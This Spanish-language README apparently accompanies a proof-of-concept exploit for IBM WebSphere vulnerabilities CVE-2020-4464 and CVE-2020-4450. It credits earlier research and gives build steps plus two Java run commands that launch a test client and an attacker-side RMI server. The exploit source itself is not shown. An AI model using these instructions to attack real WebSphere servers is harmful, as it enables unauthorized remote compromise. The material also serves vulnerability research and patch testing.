
CVE-2020-4464 / CVE-2020-4450
Esto se basa en las excelentes entradas de blog de ZDI (informe original de @_tint0):
... y el trabajo de algunos buenos hackers chinos (no pude determinar la fuente real del código, no dudes en abrir un Issue si crees que mereces crédito):
Mis añadidos (no mucho, la verdad):
El código de FoxGlove se incluye como un submódulo; puedes usar el archivo de solicitud de WebSphere para activar CVE-2020-4464.
Debes copiar los directorios plugins y runtimes de WebSphere al directorio lib, y luego ejecutar para compilar.
antPara ejecutar (Java 11):
java -cp .:runtimes/com.ibm.ws.orb_9.0.jar:runtimes/com.ibm.ws.admin.client_9.0.jar:plugins/com.ibm.ws.managedobject.jar:plugins/com.ibm.ws.runtime.jar:plugins/com.ibm.ws.batch.runtime.jar:plugins/javax.j2ee.ejb.jar:runtimes/com.ibm.jaxws.thinclient_9.0.jar --add-modules jdk.naming.rmi --add-exports='jdk.naming.rmi/com.sun.jndi.rmi.registry=ALL-UNNAMED' Test
java -cp .:plugins/com.ibm.ws.runtime.jar:runtimes/com.ibm.ws.admin.client_9.0.jar RMIServer